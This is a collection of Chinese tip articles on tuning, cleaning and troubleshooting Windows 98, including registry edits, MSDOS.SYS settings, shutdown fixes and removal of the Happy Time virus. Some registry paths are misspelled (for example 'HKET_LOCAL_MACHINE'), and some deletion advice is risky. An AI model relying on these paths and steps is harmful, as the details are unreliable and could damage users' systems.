五、关闭活动桌面

    Windows 98的默认窗口是Web窗口，这个窗口既浪费内存又费时间。开启它会降低系统性能、拖慢启动速度。关闭方法是右击桌面，选属性，然后选Web，把“按Web页方式查看活动桌面”和“Internet Explorer频道栏”点掉。不要任何桌面主题，直接在“控制面板”的“文件添加/删除”工具中将桌面主题删除。也不要设置墙纸，因为墙纸会占用大量的内存，增加启动时调图的时间。如果不迫切需要，也不要设置屏幕保护方式，这些都可以在控制面板的“显示”中进行设置。

  六、清理磁盘空间

    1、删除没有使用的应用程序：可以利用控制面板上的“增加/删除程序”完成程序的卸载；也可以通过应用程序自带的卸载程序完成。

    2、删除 “C:\Windows\Temp”目录中的程序安装时的所有文件。

    3、删除Windows目录下的“Temporary Internet Files”文件夹中上网时留下的临时文件。

    4、搜索并删除硬盘上所有无用的备份文件、临时文件、日志文件，如*.bak、*.tmp、*.log等。

    5、删除Windows\Help文件夹中的帮助文件。

    6、删除注册表中无用的注册项。如在“HKET_LOCAL_MACHINE\Software”和“HKET_CURRENT_USER\Software”主键下找到那些已被删除的子键并将其删除；
    在HKET_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\explore\Tips 下将这些子键全部删除，这是Windows的技巧提示；在HKET_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\TimeZone下，删除多余的时区，只保留北京时区；在HKET_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboardlayouts中删除不用的输入法。

    7、删除Windows下的临时文件和多余的字体文件。可以通过控制面板上的字体图标程序来查看和删除不需要的字体。

98优化设置
详细请看压缩文件


加快Windows 98重启的7种方法

《一键清理系统垃圾》

加快Windows 98重启的7种方法

    Windows 98系统稳定性不好，在使用Windows 98的电脑上，因死机、回收资源、改动设置等情况而重新启动系统可谓“家常便饭”。但如果我们使用“开始→关闭系统→重新启动计算机”命令，会让系统重新热启动，这样做是很笨拙的：既费时又费力。其实，加快Windows 98重新启动有很多种方法，一起来看一看。

    1． 功能键法

    在启动Windows 98时，如果感到启动画面显示的时间太长，可以在启动时按Esc键跳过启动画面。另外在使用“开始→关闭系统→重新启动计算机”时，先按下Shift键，然后再单击“是”按钮，这样可以加快启动速度。

    2． 快捷图标法

    在DOS模式中创建一个以“.bat”结尾的批处理文件（内容只有“@exit”5个字符），然后保存。在桌面创建此文件的快捷方式之后右键点击该图标，选择“属性→程序→高级→MS-DOS方式”，然后“确定”，以后就可以直接双击它来快速重启系统（切记要先关闭其他程序）。

    3． 结束任务法

    按下“Ctrl+Alt+Del”组合键，在出现的对话窗口中选择“Explorer”，接着选择“结束任务”，当出现提问是否要关闭系统时，选择“否”。然后稍等片刻，系统会出现一个提示问是否要结束任务，选择“结束任务”，此时屏幕会闪一下，这就意味着系统已被重置。

    4． 注销法

    单击“开始→注销”，在随后出现的对话框中选择“是”，此时系统会重新登录，从而使更改过的配置立即生效。

    5． 系统刷新法

    系统刷新虽与系统重置概念不同，但同样可以达到我们更新系统的目的。当我们在窗口中添加了一个文件夹、关闭某个应用程序或删除一个对象后，单击鼠标右键，然后选择“刷新”命令，也可按下F5键让系统会进行刷新。如果要想让系统时刻自动刷新，可以运行注册表编辑器，依次展开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update分支，在右侧窗口中将“UpdateMode”的键值改为“00”即可。

    6． DOS启动法

    在关闭Windows的窗口中选择“重新启动计算机并切换到MS-DOS方式”进入DOS，然后输入“EXIT”并回车，Windows便重新启动了，同样因为省去了BIOS检测过程，启动速度也就快多了。

    7． MSDOS．SYS设置法

    如果您既嫌启动画面显示时间长，又懒得按功能键，可以事先用记事本修改MSDOS.SYS文件。由于MSDOS.SYS的属性为只读、系统和隐藏，首先要去掉MSDOS.SYS的只读、系统隐藏属性，然后用右键单击MSDOS.SYS文件，选择“打开方式”，在弹出的对话框选择文件列表中选择“记事本”。

    下面这几段MSDOS.SYS中的语句对于大多数普通用户而言，可以有效地减少系统的启动时间：

    [Options]

    DoubleBuffer=0

    DBLSpace=0

    DRVSpace=0

    BootGUI=0

    Logo=0

    BootKeys=0

    BootMenu=0

    BootWarn=0

    BootMulti=0

    在对MSDOS.SYS文件进行修改并保存后，将它的属性恢复为只读、系统和隐藏。


解决VXD导WIN98内存“丢失”问题

《一键清理系统垃圾》

解决VXD导WIN98内存“丢失”问题

    我们在使用Win98时，有时会遇到系统报告的内存与实际安装的内存容量不一致的情况（例如实际安装了32MB内存，而在“系统属性”对话框中显示仅有30MB内存，也就是说有2MB内存“丢失”了)，这会在一定程度上影响系统性能。导致内存“丢失”的原因较多，如在启动Windows之前加载了实模式的驱动程序（如Smartdrv）、加载了与Windows不兼容的虚拟设备驱动程序（VXD程序）等，而后者尤其让不明究竟的用户理不出头绪。下面我们就说说如何利用Win98提供的“系统配置实用程序”来解决因虚拟设备驱动程序错误导致系统内存“丢失”的问题。
    首先我们必须确定系统内存“丢失”的原因，其方法是:
    1.单击“开始”选择“运行”来打开“运行”对话框。
    2.在运行对话框中输入“Msconfig”并选择“确定”，以启动“系统配置实用程序”。
    3.在“常规”选项卡里复选“选择性启动”选项。
    4.清除“处理System.ini文件”前面的选勾，再单击“确定”按钮。
    5.当系统询问“是否重新启动计算机”时，单击“是”按钮。
    重新启动计算机后，再次查看系统内存，如果Windows所报告的内存数量依然不正确，则说明系统内存“丢失”与虚拟设备驱动程序无关，用户应重复上述步骤，并在“常规”选项卡中复选“正常启动”选项，恢复系统原有设置，并另做处理。如果Windows报告的内存数量恢复正确，则说明系统内存“丢失”是加载了不正常的虚拟设备驱动程序造成的，我们就应进一步地确定引起故障的文件，具体步骤为:
    1.再次启动“系统配置实用程序”。
    2.在“系统配置实用程序”对话框中选择上面的“System.ini”选项卡来打开“System.ini”文件列表。
    3.双击“〔386Enh〕”小节，会发现“〔386Enh〕”小节中部分命令行的左边有Windows徽标，而有的命令行左边没有Windows徽标，这些没有Windows徽标的命令就是加载的虚拟设备驱动程序，清除该命令行旁的选勾，就可禁止Windows 98启动时加载该虚拟设备驱动程序。所以我们可以逐一取消各个命令行的选勾，然后重新启动计算机来查找问题所在。
    4.重新启动计算机之后，若系统所报告的内存与实际内存相符，则说明该行命令所加载的虚拟设备驱动程序就是造成Windows 98系统内存丢失的“罪魁祸首”。若系统报告的内存数量仍然不对，则应重复1～3步，恢复刚才取消的命令行选勾，然后取消下一个命令行的选勾，再启动……重复上述步骤，直至找出导致Windows 98内存丢失的虚拟设备驱动程序。
    5.在找到引发Windows系统内存“丢失”的虚拟设备驱动程序之后，再对其进行适当的处理（如升级等），即可避免此类故障的发生（在问题没有解决之前，我们可暂时禁止使用该程序）。
    至此，由虚拟设备程序导致的内存“丢失”问题解决完毕，希望以上设置能为正对此而苦恼的用户有所帮助。


Windows98不能正常关机解决法

《一键清理系统垃圾》

Windows98不能正常关机解决法

    你的Windows98不能正常关闭？老是在你执行了“开始——关闭系统——关闭计算机——确定”后，就停留在关机画面上不动弹了？你只好采取强行关机——“切断电源”？别！朋友，这样会“伤机”的！那到底该怎么办呢？请你别着急，跟我来吧！

一、试试“禁用快速关机”
    大家知道，快速关机是Windows98中的新增功能，它可以大大减少关机的时间。但是，该功能与某些硬件不兼容，如果计算机中安装了这些硬件，可能会导致计算机停止响应，使你的Windows98不能正常关闭。那么我们就禁用快速关机：
    1.点击“开始——运行”，在“打开”框中键入“msconfig”，然后单击“确定”；
    2.点击“高级”，选中“禁用快速关机”复选框，点击“确定”，然后再次“确定”；
    3.这时系统将提示重新启动计算机，请重新启动你的计算机；
    4.重新启动计算机后再次关闭计算机，等候关机。如果计算机能够正常关机，则快速关机功能可能与计算机上所安装的多个硬件设备不兼容，你可以与计算机上所安装设备的供应商联系。

二、检查AMP（高级电源管理）功能
    1.点击“开始——设置——控制面板”，然后双击“系统”；
    2.在“设备管理器”选项卡上，双击“系统设备”；
    3.双击设备列表中的“高级电源管理”，再点击“设置”选项卡，然后清除“启用电源管理”复选框；
    4.点击“确定”；
    5.重启动计算机；
    6.关闭计算机，如果计算机正常关机，则问题可能在于APM。请关闭“高级电源管理”功能。

三、退出Windows声音文件
    1.点击“开始——设置——控制面板——声音”；
    2.在“事件”框中，点击“退出 Windows”；
    3.在“名称”中，选中（无）；
    4.单击“确定”；
    5.关闭计算机。
    此时如果你的Windows98能够正常关闭，则问题是由退出声音文件所引起的。要解决这一问题，你可以从备份中恢复声音文件或重新安装提供声音文件的程序，也可以将Windows98配置为不播放“退出Windows”声音文件即可。

四、检查“启动”文件夹
    通过检查“启动”文件夹来确定“启动”文件夹中的程序是否与启动过程冲突：
    1.点击“开始——运行”；
    2.在“打开”框中，键入“msconfig”，然后单击“确定”；
    3.选中“装载启动组项目”复选框；
    4.点击“确定”；
    5.此时系统将提示重新启动计算机时，请“确定”。
    如果计算机无法正常启动或关闭，则问题可能在于从“启动”文件夹中所加载的程序，将其清除即可。

五、检查Config.sys和Autoexec.bat文件
    1.点击“开始——运行”， 在“打开”框中，键入“msconfig”，然后单击“确定”；
    2.选择“诊断启动”项；
    3.点击“确定”。
    此时系统将提示重新启动计算机，请点击“确定”。如果计算机的启动或关闭不正确，那么就请你按下面方法来确定问题是由Config.sys还是Autoexec.bat文件中的哪一行所引起的冲突故障：
    重新启动计算机，启动时，按住Ctrl键，从“Startup”菜单中选择“SafeMode”；
    点击“开始——运行”；
    在“打开”框中，键入“msconfig”，然后单击“确定”；
    点击清除Config.sys和Autoexec.bat选项卡中不含Windows图标行的复选框，使用此Config.sys文件，点击启用某行；
    点击“确定”，重新启动计算机。如果计算机的启动和关闭都很正常，启用另一行，并重复步骤4、5的爱作。
    就这样逐步启用Config.sys文件和Autoexec.bat文件中的行，直到发现问题为止。哪行有问题就对症下药地处理那一行！

六、检查内部系统问题
    1.点击“开始——运行”；
    2.在“打开”框中，键入“msconfig”，然后点击“确定”；
    3.再点击“高级”，清除“高级疑难解答设置”中的“禁用系统ROM中断点”、“禁用虚拟HDIRQ”和“EMM不包含A000_FFFF”复选框，然后点击“确定”；
    4.重新启动你的计算机。
    此时如果你的计算机正常启动，请重复以上步骤，然后在步骤3中选中某一复选框。重复此过程，直到发现计算机无法正常启动为止。

七、检查System.ini文件或Win.ini文件
    1.点击“开始——运行”；
    2.在“打开”框中，键入“msconfig”，然后单击“确定”；
    3.在“常规”选项卡中，清除“选择性启动”中的所有复选框，选中“处理System.ini文件”复选框，再选中“处理Win.ini文件”复选框；
    4.点击“确定”；
    5.重新启动你的计算机。
    此时如果计算机无法正常启动或关闭，则表明你的System.ini或Win.ini文件中的条目存在问题。请你仔细检查每一条目，以确定原因。确定引发问题的条目之后，请删除此条目或在此条目前加上（；）禁用此条目或修改此条目即可解决此问题。
八、查看Bootlog.txt文件
    请用文本编辑器“记事本”，检查Bootlog.txt文件中的Terminate=条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。如果Bootlog.txt文件的最后一行为：EndTerminate=Kernel，你的Windows98就可以成功的关闭。如果Bootlog.txt文件的最后一行为下列某项条目，请检查所列出的可能原因：

    Terminate=QueryDrivers 说明内存管理程序有问题。
    Terminate=UnloadNetwork 说明与Config.sys中的实模式网络驱动程序冲突。
    Terminate=ResetDisplay 说明需要更新视频驱动程序。
    Terminate=RIT 说明声卡或鼠标驱动程序与计时器方面有问题。
    Terminate=Win32 说明与32位程序有关的问题阻塞了线程。

九、检查Logos.sys文件
    Logos.sys是图像文件，作用是显示提示“现在可以安全地关闭计算机了”。如果该文件损坏，则关机时将不出现上述的提示信息。解决方法是将logos.sys文件删除，然后从别的Windows98系统中拷贝该文件到Windows子目录下即可。

十、检查硬件
    检查计算机的硬件配置，可以使用设备管理按下述步骤进行。
    进入“控制面板”，双击“系统”图标。 在“设备管理”标签下，使下列分支下的所有设备无效：

    显卡
    软盘驱动器控制器
    硬盘驱动器控制器
    键盘
    鼠标
    网卡
    PCMCIA插槽
    端口

SCSI控制器可以采用下列步骤使设备管理器中的某个设备无效：
    1.双击包含你想选定的设备，单击该设备，然后单击属性；
    2. 在“常规”标签下，选定“在此硬件配置文件中禁用”复选框，然后单击“确定”；
    3.重新引导你的系统。
    如果问题解决，逐个启用刚才禁用的设备，并检查有没有设备冲突。
按下列顺序逐个启用设备：
    COM端口
    硬盘控制器
    软盘控制器
    其它设备
启用禁用的设备，并检查有没有设备冲突可按下述步骤进行：
    1.在设备管理器中双击包含你想选定的设备，单击该设备，然后单击属性；
    2.在“常规”标签下启用禁用的设备；
    3.在“资源”标签下检查“冲突的设备列表”的内容。注意，并非所有设备都有“资源”标签。 单击“确定”；
    4.重新启动系统。
    如果问题仍然没有解决，可以单击“开始——程序——附件——系统工具——系统信息”，然后单击“工具”菜单，单击“自动跳过驱动程序代理”工具以启用所有被禁用设备的驱动程序。
    如果通过上述步骤，确定了是某一硬件引起的非正常关机问题，应该与该设备的代理商联系，以更新驱动程序或固件（firmware，指更新升级flash ROM的内容）。
    其实Windows 98系统非正常关机的故障并不可怕，只要我们认真对待，通过以上几种方法，基本上能够解决你的Windows98不能正常关闭的问题。


解决Windows 98无法正常关机的技巧

《一键清理系统垃圾》

解决Windows 98无法正常关机的技巧

    Windows 98通常在关机的时候，系统却没有响应，通常造成这种现象的原因有多种，可从以下五个方面入手解决：

    一、检查某些硬件是否与快速关机不兼容

    快速关机是Windows 98中的新增功能，可以大大减少关机时间。但是，该功能与某些硬件不兼容，可能会导致电脑停止响应。在“运行”对话框中的“打开”框中键入“Msconfig”启动“系统配置实用程序”，单击“高级”按钮，选中“禁用快速关机”选项。如果电脑正常关机，则快速关机功能可能与电脑上所安装的某个设备不兼容。

    二、检查文件中是否存在冲突

    以安全模式启动电脑，在“运行”对话框的“打开”框中，键入“Msconfig”启动“系统配置实用程序”，单击“诊断启动”。系统提示重新启动电脑时，请单击“确定”。如果电脑的启动关闭不正确，需要确定问题是由Config.sys或Autoexec.bat文件的哪一行引起的。逐个取消Config.sys和Autoexec.bat选项卡中不含Windows图标的行的复选标记，然后尝试关闭电脑。

    三、检查是否与“高级电源管理”有关

    在“系统”属性框中单击“设备管理器”选项卡，在“系统设备”中双击列表中的“高级电源管理”，单击“设置”选项卡，然后取消“启用电源管理”选项。如果电脑正常关机，则问题的原因可能在于APM(高级电源管理)。

    四、检查是否由声音文件所致

    在“控制面板”中双击“声音”。在“事件”框中，将“退出Windows”事件的声音设置为“无”。如果Windows98能够正常关闭，则说明该问题是由退出声音文件所引起的，要解决这一问题，可以重新安装提供声音文件的程序。

    五、判断System.ini或Win.ini文件中是否存在冲突

    在“运行”对话框中键入“Msconfig”启动“系统配置实用程序”，在“常规”选项卡中，单击以取消“启动选项”中的所有选项。选中“处理System.ini文件”选项。选中“处理Win.ini文件”选项。如果电脑仍然无法正常关闭，则说明System.ini或Win.ini中的条目存在问题。请仔细检查每一个条目，以便确定导致问题的原因。确定引发问题的条目之后，可以删除此条目或在此条目前加分号(；)以禁用此条目或者修改此条目以便不再引起问题。


介绍Windows 98中几个实用的系统工具

《一键清理系统垃圾》

介绍Windows 98中几个实用的系统工具

    Windows 98中的系统工具相信各位都很熟悉，实际上它们都是一些EXE文件而已。那么，在Windows 98中总共269个EXE文件你都知道吗？这里面除一些我们早已熟悉的工具外，其余的你都能说出它们的含义吗？

    1. EXTRACT.EXE。实际上，Windows 98超级启动盘中也带有这个命令，这个在DOS6.22中就已经出现的命令，原本只是微软开发的专门解压CAB压缩包的一个命令，不过它的功能可不仅仅只是解压缩，我们更多的是利用它来恢复光盘光盘中的系统文件。(假如你能进入图形界面，当然可以使用SFC，它的功能更为强大、方便)

    下面是笔者统计的EXTRACT.EXE命令的使用参数和命令格式：

    命令参数使用说明

    /Y

    覆盖已存在文件时不再提示

    /A

    处理全部CAB文件，从指定的第一个CAB文件开始

    /D

    显示CAB文件中所包含文件的目录，不进行解压缩

    /E

    解压缩，取代“*.*”，即解压缩所有的文件

    /L dir

    指定解压缩文件的位置，缺省为当前目录

    /C

    拷贝CAB文件

    当我们知道欲恢复的系统文件在安装光盘中所处的位置时，就可以使用EXTRACT /Y WIN98_27.CAB cdfs.vxd命令(从Windows 98的安装光盘中的名为WIN98_27.CAB压缩包中恢复cdfs.vxd文件)。不过，假如你不知道这个文件所处的准确位置时，就要先使用EXTRACT /D WIN98＿*.CAB(这里的*是代表CAB文件包的数字)对每个CAB文件查看cdfs.vxdg，就比较麻烦了。

    2.EXT.EXE。刚才介绍说EXTRACT.EXE查找路径未定的系统文件时有些麻烦，假如将它与EXT.EXE结合起来，你就无需知道欲恢复文件的具体路径了。不过要注意的是，这个EXT.EXE命令处于EBD.CAB压缩包中，你无法直接使用。必须先使用EXTRACT /Y EBD.CAB EXT.EXE命令将EBD.CAB压缩包中的EXT.EXE解压到相同目录中才可以使用，现在你知道EBD.CAB压缩包的作用了吧？。

    使用EXT.EXE命令可以很快从光盘中恢复未知路径的系统文件，键入EXT.EXE命令，接着会出现“Please enter the path windows CAB files(a:) _”时，请键入Windows 98安装盘所在路径，如“G：＼PWIN98”，回车后出现“Please enter the name(s)of the file(s) you want to extract :”时，键入你所需要查找的文件名，假如仍为cdfs.vxd，回车后会提示说“Please enter the path fo extract do(“enter”for current directory):”，它的意思是说需要输入待解压文件释放的路径，如C:＼WINDOWS＼SYSTEM”，再次回车后会出现如下确认信息：

    The options you entered were :

    Source Path : G:＼PWIN98

    File(s) to extract : cdfs.vxd

    Destination Path : C:＼windows＼system

    Is this okay?(Y/N) :

    “Y”后，EXT命令就很快开始工作，它不仅可以找到文件的详细位置，而且可以自动将文件解压后释放到指定路径下，速度极快。

    3.Bootdisk.bat。还记得Windows 98的超级启动盘吗？它最大的好处就是自带万能光驱驱动程序，大大方便了我们的系统安装。不过，假如当无法进入Windows98的图形界面，而当你想重装系统时但以前又忘了制作启动盘，除了到别人的机器上制作启动盘外，还有一种方法就是假如系统仍然能够进入DOS状态。那么，恭喜你，只要运行Windows98目录下的Command下的Bootdisk.bat批处理文件，运行后会提示你插入一张已格式化的软盘，回车后一张启动盘很快就制作完成了。当然，也可以将这个目录中的所有文件(包括系统和隐含文件)拷贝到拷贝到软盘中，同样可以达到制作启动盘的目的，而且速度可比“添加/删除程序“中快多了。

    4.Winfile.exe。文件管理器，这是我们久违了的Windows 3.1中就有的工具，笔者到现在还深深怀念它，假如你嫌资源管理器用腻了的话，不妨去试一试吧，虽然它不支持长文件名，而且也不能对控制面板和打印机等设备进行操作，但使用起来非常直观，与Windows Commander差不多。笔者再悄悄告诉你一个秘密，Windows Me中也带有这个命令，去试一试吧。

    5.Winipcfg.exe。IP设置程序，可以显示当前系统中有关网络的配置信息功能，如主机信息和Ethernet适配器信息，类似DOS界面下的ipcfg.exe,显示的信息还挺多的呢。

    6.Winpopup.exe。局域网聊天程序，它的使用很简单，只要两个人同时运行这个命令，然后点击工具栏上的“发送”按钮就可以通过网络发送信息到“用户或计算机”，还可以是“工作组”中的成员，不过这些信息发送后无法保存，关机后就会自动丢失呀。


紧急恢复Windows98/2000双启动

《一键清理系统垃圾》

紧急恢复Windows98/2000双启动

   Windows 2000推出已有一段时间了，近日随着我的电脑升级，也给爱机装上了Windows 2000，由于还暂未找到我的ESS 56K 内猫的for Win2000驱动程序，故使用了双启动，我的Windows98SE装在C盘，而Win2000装在F盘，两系统相处还算正常。在装Win2000之前，我已用Ghost对C盘作

了备份，昨天因Win98系统出了点问题，便花了4分钟将Win98系统还原到C盘，不曾想到双启动菜单就此消失，Win2000不能使用了，重装它太花时间了，幸好事先我已做了份Win2000紧急修复磁盘，现正好派上用场。

    一、制作Win2000紧急修复磁盘

    1、单击“开始/程序/附件/系统工具/系统信息”，打开“系统信息”窗口；

    2、单击“工具/Windows/备份”，打开“备份”窗口；

    3、单击“紧急修复磁盘”按钮，找开一提示窗口，要求你插入一张已格式化的空白软盘，单击“确定”；

    4、接着便会看到正在复制系统数据的画面，稍等片刻便会看到紧急修复磁盘已成功保存。

    二、使用紧急修复盘恢复双启动

    1、使用Win98启动盘重新启动系统，选择加载光驱(若你的Win2000安装文件已拷在硬盘上，可以从硬盘启动到Dos界面)；

    2、运行Win98文件夹下的“Smartdrv.exe”文件(此步不能少，否则下一步的文件复制时间会很长)，然后转到win2000安装文件夹，执行winnt.exe；

    3、可以看到系统正在向硬盘复制安装文件，复制完成后按下回车键重新启动；

    4、出现双启动画面，选择第二项更新Win2000系统；

    5、按一下“R”键，修复Win2000中文版的安装；

    6、在Win2000修复选项画面中，按一下“R”键，使用紧急修复过程修复Win2000的安装；

    7、按一下“F”键，选择“快速修复”，执行所有修复选项；

    8、按一下“回车键”，使用紧急修复软盘；

    9、插入事先做好的Win2000紧急修复软盘，按一下“回车键”，此时可看以正在加载“setup.log”文件中的信息；

    10、按一下“回车键”，要安装程序检查驱动器；

    11、检查完成后，取出软盘，按下“回车键”重新启动，这时可看到Win98/2000的双启动菜单又会来了。

    至此，Windows98/2000双启动恢复成功，最后不要忘了将C盘上多出的临时文件夹($WIN_NT$.~BT、$WIN_NT$.~LS以及$LDR$文件)删除。


经典故障：Windows 98常见故障排除方法

《一键清理系统垃圾》

经典故障：Windows 98常见故障排除方法

    虽然现在越来越多的人都使用了windowsXP了，但是相信还是有不少人还在用windows98的，不少用户是两个系统一起使用，但是自从Windows诞生的那天起，蓝屏、黑屏、非法操作等故障就时时伴随着我们，我们也想尽了各种办法解决这些故障。本期就和大家一起把这些故障来一次全面的回顾总结，再遇到这些故障时做到心中有数，手到“病”除。

    显示蓝天白云图的时间太长

    故障现象：

    启动计算机时，Windows系统会显示蓝天白云图，其显示时间一般在半分钟左右。但有些朋友的计算机用于显示蓝天白云图的时间往往长达两三分钟。

    故障分析：

    显示蓝天白云图时，系统主要是在执行Config.sys、Autoexec.bat以及Win.ini、System.ini和注册表中的启动选项，若上述文件中的自启动选项太多，就会极大地影响系统的启动速度。另外磁盘出现坏道及系统中存在病毒也会影响系统的启动速度。

    解决方法：

    首先检查Autoexec.bat文件，看其中有没有比较耗时的DOS程序命令行，若有，可根据自己的需要进行取舍，然后再查看Win.ini、System.ini和注册表中的启动选项。如果这些文件中的启动选项都被取消后，蓝天白云显示的时间仍然很长，就应该怀疑系统被病毒感染了。若病毒原因也被排除，就应该考虑是磁盘故障了。首先对磁盘进行全面扫描，检查硬盘是否存在坏道，然后运行磁盘碎片整理程序，最后运行磁盘清理程序，清除计算机中的垃圾文件。经过上述操作后，系统的启动速度将会大幅度提升。

    系统的快速启动工具栏不见了

    故障现象：

    Windows 98提供了一个由“IE”、“OE”和“显示桌面”等图标按钮组成的快速启动工具栏，有一天进入系统后，发现该快速启动工具条不见了。

    故障分析：

    该故障是用户无意中关闭了Windows 98的快速启动工具栏造成的，我们只需重新将其打开即可。另外，用户将快速启动工具栏拖到桌面上也会造成它的“失踪”。

    解决方法：

    右击Windows 98任务栏，选择弹出菜单的“工具栏”子菜单中的“快速启动”命令（如图1），快速启动工具栏就会重新出现在任务栏上。对于将快速启动工具栏拖到桌面上的情况，我们只需将它重新拖拽到任务栏中即可。


快速清除Windows 98下的Folder.htt病毒

《一键清理系统垃圾》

快速清除Windows 98下的Folder.htt病毒

    前些天，我们公司在某学校机房举行信息技术考试，考试时原本早已测试好的网络系统却变得异常的缓慢，甚至有的电脑无法回收数据、不能进入考试系统，有的虽进入考试系统却无法正常显示考试题。笔者平常用电脑还算比较细心，对网络的安全防范意识还是较强，因此给我的第一个反应就是：电脑已感染病毒，于是用杀毒软件一查，在一台电脑上就查出了2000多个病毒文件，仔细一看，全是Desktop.ini和Folder.htt两文件。

    经过查询，才知道是“欢乐时光病毒”。该病毒是流传最广的病毒之一，具体表现为驻留在每个文件夹中的两个隐藏文件：Desktop.ini和Folder.htt，会导致系统速度减慢，某种变种到月份和日期加起来等于13的时候会删除机器内所有的网页文件。Folder.htt是Windows用于实现“按Web页查看”的一个系统文件，所谓Folder.htt病毒，是每当你打开一个文件夹时，都会将一个Folder.htt复制到当前文件夹中，它是一个VBS脚本。

    当我对此病毒有了一定的认识后，我便慢慢地研究起清除它的方法来，从www.czez.com.cn/Soft_Show.asp?SoftID=27下载欢乐时光病毒专杀工具1.0进行查杀。但因染毒严重，一天下来才弄好5~6台电脑，如此低的工作效率我当然不肯善罢甘休(机房共有32台电脑，必须尽快找到一条捷径)，于是同时对三台电脑进行查杀(方法当然各不相同，意在寻找病毒文件根源)。在查杀过程中，我偶然发现一文件Shfolder.dll，仔细分析它与Folder.htt，判断二者一定有着某种联系，于是将Shfolder.dll作重点嫌疑对象进行处理。具体方法如下：

    首先进入Windows系统，通过“查找”程序，找出电脑中的Desktop.ini和Folder.htt两个文件，然后将其删除；然后重新启动计算机，重新启动时，按Del键进入BIOS设置程序，将系统启动设置为软驱引导；用软盘进行引导(请确认是Windows 98系统的无毒引导盘)，引导进入纯DOS系统下，进入C:\windows\system目录内，将其目录下的Shfolder.dll删除；重新启动Windows后，运行欢乐时光病毒专杀工具1.0进行查杀。

    用此法进行清除欢乐时光病毒，有两个好处：一是清除一台电脑的病毒只需几分钟；二是方法简单，操作者只要掌握一些电脑的基本知识即可，不像有的方法那样要修改注册表、编程，复杂、难懂。


快速重启Windows 98

《一键清理系统垃圾》

快速重启Windows 98

    1.右击桌面空白处，然后从弹出的快捷菜单中执行“新建”、“快捷方式”命令，打开“创建快捷方式”对话框。
    2.在“创建快捷方式”对话框的“命令行”栏中输入“Rundll.exe user.exe，exitWindows”命令。
    3.单击“下一步”按钮，然后从弹出的“选择快捷方式名称”栏中输入“重新启动Windows 98”。
    4.单击“完成”按钮。
    执行完以上步骤后，Windows 98的桌面上就会生成一个名为“重新启动Windows 98”的快捷方式，只需双击该快捷方式，Windows 98就会立即重新启动系统，并且它不会询问其它内容，也不需要用户从事其它任何操作。


快速重装Win 98三法

《一键清理系统垃圾》

快速重装Win 98三法

    高手也难免因系统崩溃而重装Win 98。重装Win 98很费时间，且重装过程中还常会碰到许多麻烦，这常令新手们感到棘手。下面介绍三种快速简便重装Win 98的方法。
#1　　一、 从硬盘安装
    通常安装Win 98都是通过光盘，速度很慢。其实Win98以及许多种应用软件都可以通过硬盘安装，速度可以明显提高。以光驱为G盘，准备将安装文件储存在D盘为例，具体操作是：在D盘创建文件夹Win 98，将安装光盘上Win 98目录下的所有文件拷贝进去。然后在DOS下运行D:\win98\setup.exe即可。
#1　　二、部分恢复安装
    系统如果没有完全崩溃，但有些系统错误通过磁盘扫描或纠错软件又没法修复，可以使用Win 98的部分恢复安装程序。这个安装程序可以在Win 98光盘的tools文件夹里找到。方法是：转入DOS状态，进入tools\sysrec目录，运行“pcrestor”，安装程序将会启动。这种安装的速度和硬盘安装的速度差不多，但它不会造成数据丢失。同时，重新设置硬件时，一般都会自动完成。
#1　　三、利用Win 98备份工具
    Win 9x都有备份功能。他们就是专门设计用来在Win 9x还能启动时恢复系统的。Win 98的备份功能比较稳定。可惜的是，多数新手不重视它，却热心地搜集一些电脑急救软件。要想使用备份工具恢复系统，首先要建立备份。
    1．在开始菜单里选择系统工具中的“备份”。在出现的对话框里选择“新建备份作业”。点“确定”后，出现新对话框，默认选项是“备份我的电脑”。
    2．选择“备份选定的文件、文件夹和驱动器”。点下一步后，出现驱动器列表。勾选要备份的驱动器，通常是系统盘，即C盘。
    3．点下一步后，出现两个选项。如果是第一次建立系统盘C盘备份，应选“所有选定的文件”。如果你以前曾经备份过C盘，这一次是更新，可选“新建与已更改的文件”。下一个对话框是“备份至何处”，请选系统盘（C盘）以外的一个硬盘。
    4．点“确定”后，出现选项“比较原始和备份文件以检测数据被成功地备份”、“压缩备份数据以节省空间”，最好全部勾选这两项。然后计算机就开始备份。备份完毕，程序会对比备份与原始文件。请注意：在建立备份时要关闭所有应用程序，否则相应的备份文件无法完成。备份对比完成后出现一个窗口，可能提示备份出现错误。点击“报告”会列出备份出错的文件。如果备份出错的文件不属于关键程序，仅是比如Internet临时文件或者Schedule，这个备份还是有效。
    5．操作系统和应用软件的升级、添加、删除时，备份应该随时进行更新。不然备份的恢复就会出现问题。更新备份时，如果按第3点选“新建与已更改的文件”，速度极快，几分钟就可以完成。
    当系统很不稳定或者常常出现错误时，我们就可以使用建立的备份进行恢复了。恢复备份和其他重装Win 98的方法相比有一个很大的优点，只要操作得当，原来的软硬件设置都能得到完整地保存，因为它恢复的是整个系统盘，不仅类似重装Win 98，还可以恢复备份的所有其他文件和数据。恢复备份的步骤如下：
    ①启动“备份”工具。在出现的对话框里选“还原备份文件”。
    ②如果你仅仅备份过系统盘，一路采用默认选项就可以顺利完成备份恢复。倘若你通过Win 98的备份功能还备份过其他文件或者驱动器，注意应在“还原位置”窗口打开其中的下拉菜单，选定要恢复的驱动器。


让Win98拥有NT的安全性

《一键清理系统垃圾》

让Win98拥有NT的安全性

    我看了2000年《电脑报》第26期的《用系统策略编辑器实现多用户管理》（下面简称《用》）一文后大受启发，遂用“系统策略编辑器”和“超级兔子魔法设置”将放在老师办公室的电脑设置成了拥有各种不同权限的系统，并且系统之间互不冲突，共用软、硬件资源，除了超级用户外，其他人无法安装软件、运行未指定的程序甚至打开资源管理器和进入DOS。真是爽极了！
    下面我将以老师办公室Win98的改造作为实例说明，希望能起抛砖引玉之功效。
    1．安装“系统策略编辑器”和“超级兔子魔法设置”两个软件，前者在《用》一文中已说明如何安装，后者在各大软件网站、报刊配套光盘等中都能找到，要注意的是，必须用3.0版，因为下面第6步中的鼠标右键菜单的设置功能在3.0版中才有。
    2．双击任务栏里的“计划任务”小图标，在菜单的“高级”中选择“终止使用计划任务程序”。以防止有人通过“计划任务”运行其他未授权的程序。
    3．在控制面板中设置了三个用户，分别是“超级用户”、“授权用户（老师）”、“一般用户（学生）”。这样系统中就有了四个权限，“超级用户”拥有一切权限，而那些按“取消”键进入的匿名用户则什么也不能做。
